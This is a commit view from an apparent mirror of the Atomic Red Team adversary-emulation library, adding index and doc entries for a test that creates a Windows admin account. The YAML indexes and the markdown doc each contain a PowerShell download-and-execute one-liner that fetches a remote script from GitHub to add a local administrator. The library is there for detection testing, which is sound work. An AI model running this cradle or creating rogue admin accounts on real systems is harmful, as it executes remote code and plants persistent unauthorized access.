security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2023-11-17 17:46:05 +00:00
parent 5a9d3290f2
commit 04a5812d41
9 changed files with 60 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1026,6 +1026,7 @@ persistence,T1136.001,Create Account: Local Account,5,Create a new user in Power
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1026 persistence T1136.001 Create Account: Local Account 6 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
1027 persistence T1136.001 Create Account: Local Account 7 Create a new user in FreeBSD with `root` GID. d141afeb-d2bc-4934-8dd5-b7dba0f9f67a sh
1028 persistence T1136.001 Create Account: Local Account 8 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
1029 persistence T1136.001 Create Account: Local Account 9 Create a new Windows admin user via .NET 2170d9b5-bacd-4819-a952-da76dae0815f powershell
1030 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
1031 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
1032 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -668,6 +668,7 @@ persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8
persistence,T1136.001,Create Account: Local Account,4,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,5,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
668 persistence T1136.001 Create Account: Local Account 4 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
669 persistence T1136.001 Create Account: Local Account 5 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
670 persistence T1136.001 Create Account: Local Account 8 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
671 persistence T1136.001 Create Account: Local Account 9 Create a new Windows admin user via .NET 2170d9b5-bacd-4819-a952-da76dae0815f powershell
672 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
673 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
674 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1533,6 +1533,7 @@
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
- Atomic Test #8: Create a new Windows admin user [windows]
- Atomic Test #9: Create a new Windows admin user via .NET [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1036,6 +1036,7 @@
- Atomic Test #4: Create a new user in a command prompt [windows]
- Atomic Test #5: Create a new user in PowerShell [windows]
- Atomic Test #8: Create a new Windows admin user [windows]
- Atomic Test #9: Create a new Windows admin user via .NET [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
atomics/Indexes/index.yaml
+12
View File
@@ -66610,6 +66610,18 @@ persistence:
'
name: command_prompt
elevation_required: true
- name: Create a new Windows admin user via .NET
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
description: 'Creates a new admin user in a powershell session without using
net.exe
'
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
name: powershell
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
atomics/Indexes/windows-index.yaml
+12
View File
@@ -56194,6 +56194,18 @@ persistence:
'
name: command_prompt
elevation_required: true
- name: Create a new Windows admin user via .NET
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
description: 'Creates a new admin user in a powershell session without using
net.exe
'
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
name: powershell
elevation_required: true
T1053.001:
technique:
x_mitre_platforms:
atomics/T1136.001/T1136.001.md
+30
View File
@@ -24,6 +24,8 @@ Such accounts may be used to establish secondary credentialed access that do not
- [Atomic Test #8 - Create a new Windows admin user](#atomic-test-8---create-a-new-windows-admin-user)
- [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)
<br/>
@@ -335,4 +337,32 @@ net user /del "#{username}" >nul 2>&1
<br/>
<br/>
## Atomic Test #9 - Create a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 2170d9b5-bacd-4819-a952-da76dae0815f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
```
<br/>